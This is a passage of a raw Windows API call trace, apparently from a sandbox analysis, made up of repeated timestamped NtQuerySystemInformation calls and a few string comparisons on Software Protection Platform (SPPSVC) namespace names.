(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0273.928] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0273.937] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0273.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0273.947] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0273.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0273.954] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, 